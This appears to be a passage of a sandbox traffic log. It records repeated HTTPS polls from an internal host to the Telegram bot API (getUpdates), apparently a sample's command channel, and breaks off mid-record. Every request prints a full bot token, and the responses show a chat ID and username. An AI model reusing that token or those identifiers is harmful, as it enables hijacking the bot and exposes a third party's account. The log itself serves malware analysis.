2024-09-02 14:51:23 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	56236	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:24 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:25 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:25 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	56237	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:24 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:25 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:25 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.5	56239	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:26 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:26 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:27 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	56240	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:26 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:27 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:27 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	56241	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:28 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:28 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:28 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	56242	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:28 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:28 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:28 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	56243	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:30 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:30 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:30 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	56244	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:30 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:30 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:30 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	56245	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:32 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:32 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:32 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	56246	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:32 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:32 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:32 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	56247	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:35 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:35 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:35 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	56248	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:35 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:35 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:35 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 Data Ascii: {"ok":true,"result":[{"update_id":140376750,"my_chat_member":{"chat":{"id":6893446818,"first_name":"\u560e\u560e","last_name":"\u560e\u560e","username":"xingcai943","type":"private"},"from":{"id":6893446818,"is_bot":false,"first_name":"\u560e\u560e","las

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	56250	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-09-02 14:51:37 UTC	112	OUT	GET /bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-09-02 14:51:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 14:51:37 GMT Content-Type: application/json Content-Length: 636 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 14:51:37 UTC	636	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 31 34 30 33 37 36 37 35 30 2c 0a 22 6d 79 5f 63 68 61 74 5f 6d 65 6d 62 65 72 22 3a 7b 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 35 36 30 65 5c 75 35 36 30 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 78 69 6e 67 63 61 69 39 34 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 38 39 33 34 34 36 38 31 38 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 